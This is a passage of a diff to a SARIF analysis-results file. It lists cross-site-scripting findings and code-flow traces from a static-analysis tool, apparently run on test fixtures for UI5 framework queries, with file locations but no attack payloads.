"oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 289 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 126 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 27, - "startColumn" : 36, - "endColumn" : 41 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "8ceecee7055f4fa2:1", - "primaryLocationStartColumnFingerprint" : "23" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 26, - "startColumn" : 25, - "endColumn" : 42 - } - }, - "message" : { - "text" : "oInput.getValue()" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : 
{ - "startLine" : 26, - "startColumn" : 17, - "endColumn" : 42 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 27, - "startColumn" : 36, - "endColumn" : 41 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 26, - "startColumn" : 25, - "endColumn" : 42 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 127 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 362 - }, - "region" : { - "startLine" : 8, - "startColumn" : 28, - "endColumn" : 46 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "353ad97f4bff4eae:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 367 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 363 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", - "uriBaseId" : "%SRCROOT%", - "index" : 361 - }, - "region" : { - "startLine" : 5, - "startColumn" : 15, - "endColumn" : 33 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 362 - }, - "region" : { - "startLine" : 8, - "startColumn" : 28, - "endColumn" : 46 - } - }, - "message" : { - "text" : 
"oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 367 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 128 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 386 - }, - "region" : { - "startLine" : 8, - "startColumn" : 28, - "endColumn" : 46 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "353ad97f4bff4eae:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 398 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 389 - }, - "region" : { - "startLine" : 9, - 
"startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 388 - }, - "region" : { - "startLine" : 7, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 386 - }, - "region" : { - "startLine" : 8, - "startColumn" : 28, - "endColumn" : 46 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 398 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 129 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 397 - }, - "region" : { - "startLine" : 8, - "startColumn" : 28, - "endColumn" : 46 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "353ad97f4bff4eae:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 402 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 399 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 396 - }, - "region" : { - "startLine" : 7, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 397 - }, - "region" : { - "startLine" : 8, - "startColumn" : 28, - "endColumn" : 46 - } - }, - 
"message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 402 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 130 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", - "uriBaseId" : "%SRCROOT%", - "index" : 375 - }, - "region" : { - "startLine" : 21, - "startColumn" : 22, - "endColumn" : 32 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "5d5122f6c75b5d01:1", - "primaryLocationStartColumnFingerprint" : "9" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", - "uriBaseId" : "%SRCROOT%", - "index" : 375 - }, - "region" : { - "startLine" : 18, - "startColumn" : 20, - "endColumn" : 30 - } - }, - "message" : { - "text" : "/input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 371 - }, - "region" : { - "startLine" : 9, - "startColumn" 
: 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", - "uriBaseId" : "%SRCROOT%", - "index" : 375 - }, - "region" : { - "startLine" : 21, - "startColumn" : 22, - "endColumn" : 32 - } - }, - "message" : { - "text" : "/input" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", - "uriBaseId" : "%SRCROOT%", - "index" : 375 - }, - "region" : { - "startLine" : 18, - "startColumn" : 20, - "endColumn" : 30 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 131 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", - "uriBaseId" : "%SRCROOT%", - "index" : 382 - }, - "region" : { - "startLine" : 13, - "startColumn" : 15, - "endColumn" : 25 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "c18df3aa119b40dc:1", - "primaryLocationStartColumnFingerprint" : "11" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", - "uriBaseId" : "%SRCROOT%", - "index" : 382 - }, - "region" : { - "startLine" : 9, - "startColumn" : 13, - "endColumn" : 23 - } - }, - "message" : { - "text" : "\"value\": \"{/input}\"" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 379 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", - "uriBaseId" : "%SRCROOT%", - "index" : 382 - }, - "region" : { - "startLine" : 13, - "startColumn" : 15, - "endColumn" : 25 - } - }, - "message" : { - "text" : "\"content\": \"{/input}\"" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", - "uriBaseId" : "%SRCROOT%", - "index" : 382 - }, - "region" : { - "startLine" : 9, - "startColumn" : 13, - "endColumn" : 23 - } - }, - "message" : { - "text" : "user-provided value" 
- } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 132 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 167 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 50 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "74b35e217af6aa05:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 167 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 166 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 167 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" 
: 50 - } - }, - "message" : { - "text" : "content={/input}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 167 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 133 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 134 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 135 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 136 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 137 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - }, - "region" : { - "startLine" : 9, - "startColumn" : 5, - "endColumn" : 40 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "9caa0f252fbe2993:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 31, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 9, - "startColumn" : 25, - "endColumn" : 53 - } - }, - "message" : { - "text" : "oModel. ... 
input')" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 53 - } - }, - "message" : { - "text" : "input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 10, - "startColumn" : 44, - "endColumn" : 49 - } - }, - "message" : { - "text" : "input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 32, - "startColumn" : 17, - "endColumn" : 30 - } - }, - "message" : { - "text" : "output1: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - }, - "region" : { - "startLine" : 9, - "startColumn" : 5, - "endColumn" : 40 - } - }, - "message" : { - "text" : "content={/output1}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 138 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - }, - "region" : { - "startLine" : 17, - "startColumn" : 5, - "endColumn" : 40 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "2963bbd458e69924:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 18, - "startColumn" : 31, - "endColumn" : 60 - } - }, - "message" : { - "text" : "oEvent. ... 
Value()" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 18, - "startColumn" : 17, - "endColumn" : 60 - } - }, - "message" : { - "text" : "sInputValue" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 19, - "startColumn" : 44, - "endColumn" : 55 - } - }, - "message" : { - "text" : "sInputValue" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 34, - "startColumn" : 17, - "endColumn" : 30 - } - }, - "message" : { - "text" : "output3: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - }, - "region" : { - "startLine" : 17, - "startColumn" : 5, - "endColumn" : 40 - } - }, - "message" : { - "text" : "content={/output3}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - }, - "region" : { - "startLine" : 18, - "startColumn" : 31, - "endColumn" : 60 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 139 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 323 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 37 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "97b29ed20ac04ff0:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 323 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 319 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 323 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 37 - } - }, - "message" : { - "text" : "content={/input}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ 
{ - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 323 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 140 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 38 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "1406455ac263a2d9:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 